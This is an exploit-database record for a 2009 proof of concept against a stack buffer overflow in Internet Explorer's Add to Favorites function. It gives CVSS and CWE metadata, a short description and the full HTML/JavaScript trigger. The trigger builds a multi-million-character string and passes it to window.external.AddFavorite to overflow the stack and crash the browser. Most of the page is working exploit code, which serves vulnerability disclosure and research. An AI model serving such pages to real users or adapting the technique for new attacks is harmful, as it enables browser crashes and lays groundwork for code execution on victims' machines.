IE Add Favourites Stack Buffer Overflow POC

vendor:

Internet Explorer

by:

Sberry, Compaq

9,3

CVSS

HIGH

Stack Buffer Overflow

119

CWE

Product Name: Internet Explorer

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

IE Add Favourites Stack Buffer Overflow POC

This proof-of-concept code exploits a stack buffer overflow vulnerability in Internet Explorer. The vulnerability is triggered when a user adds a maliciously crafted URL to their favorites list. The code creates a long string of characters and passes it to the vulnerable function, which causes a stack buffer overflow.

Mitigation:

Microsoft has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

------------------------------------------->
IE Add Favourites Stack Buffer Overflow POC

Sberry, Compaq

------------------------------------------->

<html>
<head>
<script language="JavaScript" type="Text/Javascript">
function go()
{
	var str =unescape('%u4141');
	var finalstr = createInlineBuffer(str, 5150000);
	var len = finalstr.length;
	document.write(len);
	addfav(finalstr);
}
			   
/* Effient in-line creation */
function createInlineBuffer (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}

/* Vulnerable Function */
function addfav(str)
   {
   if (document.all)
      {
      window.external.AddFavorite
      ('http://'+str,'Crash')
      }
   }
</script>
</head>
<body>
<a href="javascript:go()">Add To Favorites</a>
</body>
</html>

# milw0rm.com [2009-07-09]